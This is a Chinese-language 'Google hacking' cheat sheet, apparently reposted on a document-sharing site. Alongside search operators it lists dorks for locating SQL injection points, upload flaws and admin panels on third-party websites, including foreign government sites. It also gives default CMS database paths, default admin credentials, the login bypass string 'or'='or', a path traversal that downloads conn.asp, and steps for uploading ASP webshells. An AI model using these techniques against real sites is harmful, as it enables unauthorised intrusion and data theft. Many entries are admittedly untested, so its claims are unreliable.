google hacking高级搜索方法

更新时间：2024-01-24 06:47:01 阅读量：教育文库文档下载

说明：文章内容仅供预览，部分内容可能不全。下载后的文档，内容与下面显示的完全一致。下载之前请确认下面内容是否您想要的，是否完整无缺。

google推荐度：
相关推荐

============================================================== ==============================================================

高级搜索的使用方法

============================================================== ==============================================================

inurl: 用于搜索网页上包含的URL. 这个语法对寻找网页上的搜索,帮助之类的很有用.

intext: 只搜索网页部分中包含的文字(也就是忽略了标题,URL等的文字). site: 可以限制你搜索范围的域名. filetype: 搜索文件的后缀或者扩展名 intitle: 限制你搜索的网页标题.

allintitle: 搜索所有关键字构成标题的网页. 但是推荐不要使用

link: 可以得到一个所有包含了某个指定URL的页面列表. 例如link:www.google.com 就可以得到所有连接到Google的页面.不用担心

=================================================== intext:管理 filetype:mdb inurl:file

site:xx.com filetype:txt 查找TXT文件其他的依次内推 site:xx.com intext:管理 site:xx.com inurl:login site:xx.com intitle:后台查看服务器使用的程序

site:xx.com filetype:asp site:xx.com filetype:php site:xx.com filetype:jsp 查看上传漏洞：

site:xx.com inurl:file site:xx.com inurl:load 查找注射点：

site:xx.com filetype:asp

site:tw inurl:asp?id= 这个是找台湾的或

site:jp inurl:asp?id= 这个是找日本的或

site:ko inurl:asp?id= 这个是找韩国的依次类推

intitle:旁注- 网站xxxfiletype:asp inurl:editor/db/

inurl:eWebEditor/db/ inurl:bbs/data/ inurl:databackup/ inurl:blog/data/ inurl:\\boke\\data inurl:bbs/database/ inurl:conn.asp inc/conn.asp 管理入口: admin

admin_index admin_admin index_admin admin/index admin/default admin/manage admin/login manage_index index_manage superadmin admin1

admin_login login_admin ad_login ad_manage count manager guanli denglu houtai

houtaiguanli htgl

adminlogin

adminuserlogin adm_login chklogin chkadmin users adduser admin_user edituser

adminadduser

member members editmember adminmember addmember logout exit

login_out adminedit admin_edit delete

admindelete admin_delete up

upload upfile backup config test

webmaster root aadmin admintab admin_main art

article databases db dbase devel files forum girl girls htdocs idea ideas include includeinc includes incoming install manual misc

mrtg private program

programming programs public secret secrets

server_stats

server-info server-status set

setting setup *** snmp source sources sql

statistics Stats

telephone temp

temporary tool tools usage weblog weblogs webstats work wstats wwwlog wwwstats wenzhang

admin/login.asp admin_index.asp

bbs/admin_index.asp

article/admin/admin.asp admin/aspcheck.asp inc/config.asp

eWebEditor/admin_login.asp editor/admin_login.asp

count_admin add_admin admin_pass newbbs/login down/login

bbs/admin/login main/login

admin/manage.asp manage/login.asp user.asp conn.asp logout.asp readme.txt 说明.txt

manager/login

manager/login.asp manager/admin.asp

admin_login/admin.asp admin_login/login.asp admin/manage/admin.asp admin/manage/login.asp admin/default/admin.asp admin/default/login.asp member/admin.asp member/login.asp

administrator/admin.asp administrator/login.asp 强大的数据库:

database/PowerEasy4.mdb #动易网站管理系统4.03数据库 database/PowerEasy5.mdb database/PowerEasy6.mdb database/PowerEasy2005.mdb database/PowerEasy2006.mdb database/PE_Region.mdb

data/dvbbs7.mdb #动网论坛数据库

2)默认后台管理帐号：msmir

3)默认后台管理密码：msmirmsmir 或 msmir

数据库文件为 http://您的域名/msmirdata/msmirArticle.mdb 或者是 http://您的域名/msmirdata/msmirArticle.asa

数据库连接文件为 ***********/Conn.asp

也是默认数据库地址。现在传奇4F好多都是这个。呵呵我刚还没事搞了个呢`

18、百度里输入/skins/default/ 19、利用挖掘机

关键机:power by Discuz 路径:/wish.php 配合:

Discuz!论坛 wish.php远程包含漏洞 ……

20、上传漏洞.

工具 : 当然还是明小子了网站猎手或者挖掘鸡了。关键字powered by mypower

检测的页面或文件插入upfile_photo.asp 这个用的人也N多。。

21、新云漏洞

这个漏洞ACCESS和SQL版通吃。

Google搜索关键字 ?关于本站 – 网站帮助 – 广告合作 – 下载声明 – 友情连接 – 网站地图 – 管理登录?

把flash/downfile.asp?url=uploadfile/http://www.cnblogs.com/conn.asp提交到网站根目录。就可以下载conn.asp 以源码，软件等下载站居多。

大家时常碰到数据库如果前面或者中间+了# 可以用#替换就可以下载了 \\database\\#newasp.mdb

如：#xzws.mdb 改成#xzws.mdb

收集的。没试过。。。 – -！

22、通吃所有商城+动力上传系统

使用工具:挖掘鸡 v1.1 明小子商城**:

关键字:选购->加入购物车->去收银台->确认收货人信息->选付款方式->选配送方式->在线支付或下单后汇款->汇款确认->发货->完成漏洞页面:upload.asp

upfile_flash.asp

还是上传漏洞拿webshell

23、注射漏洞

百度搜索ioj’s blog

24、动易列目录

admin_articlerecyclebin.asp

inurl:admin_articlerecyclebin.asp

25、

工具:网站猎手

关键词:inurl:Went.asp 后缀:manage/login.asp 口令:’or’='or’

这软件还不是太熟悉。 – -

26、

**魔兽私服

需要的工具：ASP木马 – -！废话了。明小子

数据库的地址：chngame/#chngame.mdb

都默认的。数据库闹下来自己解密吧不多说了。

27、

漏洞是利用管理员iis设置的失误

用baidu 关键字就是比较罕见的脚本名动网: ReloadForumCache.asp Leadbbs: makealltopanc.asp BBSXP: admin_fso.asp

动易: admin_articlerecyclebin.asp

好像比较少吧不太清楚了这个。。

28、

国外站的爆库漏洞

关键字：sad Raven’s Guestbook 密码地址:/passwd.dat

后台地址:/admin.php

29、

Discuz 4.1.0跨站漏洞利用工具:1)WAP浏览器 2)WAP编码转换器

关键字:?intextiscuz! 4.1.0″

WAP浏览器…………………………!!

30、

关键字：尚奈克斯

后台路径/system/manage.asp? 直接传ASP木马

挖掘机去。。 – -！

31、工具

1:网站猎手 2:大马

关键字:切勿关闭Cookies功能，否则您将不能登录插入diy.asp

32、

剩下的自己搞。不多说了

33、

工具: 挖掘机辅臣数据库读取器

关键字: 企业简介产品展示产品列表后缀添加: /database/myszw.mdb 后台地址: admin/Login.asp

都默认的。一样。数据库闹下来自己解密码去。就行了。。

34、

关键子 XXX inurl:Nclass.asp ……

在?系统设置?里写个木马。会被保存到在 config.asp内。 35、

不进后台照样拿动网WEBSHELL

- –data.asp?action=BackupData 动网数据库备份默认路径

没试过。。。不知道。

36、

工具:网站猎手 WebShell 关键字:inurl:Went.asp 后缀:manage/login.asp 弱口令:’or’='or’

也没试过。。。。。。。 37、

关键字owered byCDN_NEWS

??便扫遍文章加一个’ ，来试探注入点后台地址:admin_index.asp

用啥工具我就不说了吧。。。。。。。。。 38、

**雷池新闻发布系统关键字:leichinews

去掉leichinews后面的.

打上:admin/uploadPic.asp?actionType=mod&picName=xuanran.asp 再上传马…..

进访问uppic anran.asp 登陆马. —-

没试过。汗，收集来的。 39、

工具挖掘机就行了。

关键字ower System Of Article Management Ver 3.0 Build 20030628 默认数据库:database\\yiuwekdsodksldfslwifds.mdb 后台地址:自己扫描!

工具明小子。- -！怎么又是他啊。 MD5自己解………

(NND这个一扫一大堆。大家可以去试试。。) 40、

一、通过GOOGLE搜索找大量注入点关键字：asp?id=1 gov.jp/ asp?id= 页数：100

语言：想**哪个国家就填什么语言吧

41、

关键字：Powered by:94KKBBS 2005 利用密码找回功能找回admin 提问:ddddd 回答:ddddd

42、

关键字:inurl:Went.asp 后台为manage/login.asp

后台密码: ‘or’=’ 或者 ‘or?=?or’ 登录进入默认数据库地址atabase/DataShop.mdb

43、

关键字:****** inurl:readnews.asp

把最后一个/改成\ ，直接暴??，看密码，进后台随便添加个新闻在标题输入我们的一句话木马 44、

工具:一句话木马

BBsXp 5.0 sp1 管理员猜解器关键词:powered by bbsxp5.00 进后台，备份一句话马!

45、

关键字：程序核心：BJXSHOP网上开店专家后台:/admin ?

本文来源：https://www.bwwdw.com/article/wzuo.html

相关文章：

正在阅读：

google hacking高级搜索方法01-24

质差小区分析及解决方案03-10

医院宪法宣传周活动总结五篇07-31

2017届宁夏银川一中高三第二次模拟数学（理）试题11-19